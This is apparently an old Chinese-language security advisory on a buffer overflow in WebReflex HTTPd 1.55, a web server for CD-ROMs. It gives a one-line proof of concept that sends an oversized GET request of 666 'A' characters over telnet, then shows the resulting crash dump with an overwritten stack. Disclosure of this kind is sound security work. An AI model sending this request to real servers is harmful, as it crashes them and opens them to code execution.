WebReflex HTTPd 缓冲区溢出

/ns/ld/softld/data/20010306130520.htm

WebReflex HTTPd 缓冲区溢出

简介
WebReflex是一个专门用在CD-ROM上的Web server. 此上的一个弱点允许攻击者溢出其中一个程序的内部缓冲导致执行任意代码.

详细情况
易受攻击系统:
WebReflex version 1.55

举例
$ echo "GET " `perl -e 'print "A" x 666'` | telnet www.example.com 80
会导致在几秒种内退出程序并且显示:

REFLEX16 caused a general protection fault in module KRNL386.EXE at 0001:00008aee.
Registers:
EAX=86cf0000 CS=014f EIP=00008aee
EFLGS=00000282 EBX=830f000a SS=86f7
ESP=00008d86 EBP=00008da0 ECX=0000000a
DS=0167 ESI=00009051 FS=0000 EDX=ffff8dae
ES=86ef EDI=00008c82 GS=0000
Bytes at CS:EIP:
07 1f 61 c3 06 2e 8e 06 02 00 26 89 16 f4 12 26
Stack dump:
41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141
41414141

解决办法
发布商已被通报


附加消息
The information has been provided by slipy.